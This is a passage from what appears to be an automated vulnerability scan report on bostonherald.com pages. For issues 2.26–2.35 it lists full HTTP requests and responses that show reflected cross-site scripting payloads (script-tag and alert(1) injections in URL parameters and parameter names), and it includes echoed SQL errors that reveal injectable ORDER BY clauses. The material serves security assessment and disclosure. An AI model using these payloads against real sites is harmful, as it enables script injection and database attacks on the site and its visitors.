The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aa21</script><script>alert(1)</script>b29dc7874f2 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2759
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script>
...[SNIP]...

2.26. http://www.bostonherald.com/mediacenter/video.php [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51c2</script><script>alert(1)</script>07de356f883 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalkb51c2</script><script>alert(1)</script>07de356f883 snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:02:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
p://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Sidewalkb51c2</script><script>alert(1)</script>07de356f883");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","
...[SNIP]...

2.27. http://www.bostonherald.com/mediacenter/video.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e143d"><script>alert(1)</script>a9e85fd0010 was submitted in the width parameter. This input was echoed as e143d\"><script>alert(1)</script>a9e85fd0010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370e143d"><script>alert(1)</script>a9e85fd0010&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2533
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w370e143d\"><script>alert(1)</script>a9e85fd0010xh300">
...[SNIP]...

2.28. http://www.bostonherald.com/news/politics/view.bg [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff39a'-alert(1)-'96f43005832 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/politics/view.bg?articleid=1312665&format=emailff39a'-alert(1)-'96f43005832 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312665&format=emailff39a'-alert(1)-'96f43005832'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

2.29. http://www.bostonherald.com/news/regional/view.bg [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf1d'-alert(1)-'71a4876b0f9 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/regional/view.bg?articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

2.30. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c00b'-alert(1)-'f86646641f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/cambridge/?5c00b'-alert(1)-'f86646641f6=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 529
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.31. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4bca(a)57e0d5026f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/cambridge/?f4bca(a)57e0d5026f9=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 502
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?f4bca(a)57e0d5026f9=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4bca(a)57e0d5026f9=1 LIMIT 0,20' at line
...[SNIP]...

2.32. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c260f(a)d58a654d6ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/mass_pike/?c260f(a)d58a654d6ed=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 370
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?c260f(a)d58a654d6ed=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?c260f(a)d58a654d6ed=1 LIMIT 0,20' at line
...[SNIP]...

2.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0b5'-alert(1)-'a16c453c05d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/mass_pike/?4f0b5'-alert(1)-'a16c453c05d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6c960(a)77d7148e6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quasi_state/?6c960(a)77d7148e6d8=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 540
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?6c960(a)77d7148e6d8=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?6c960(a)77d7148e6d8=1 LIMIT 0,20' at line
...[SNIP]...

2.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb58b(a)bc791e733d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quincy/?eb58b(a)bc791e733d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 365
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?eb58b(a)bc791e733d=1 LIMIT 0,20

Error:
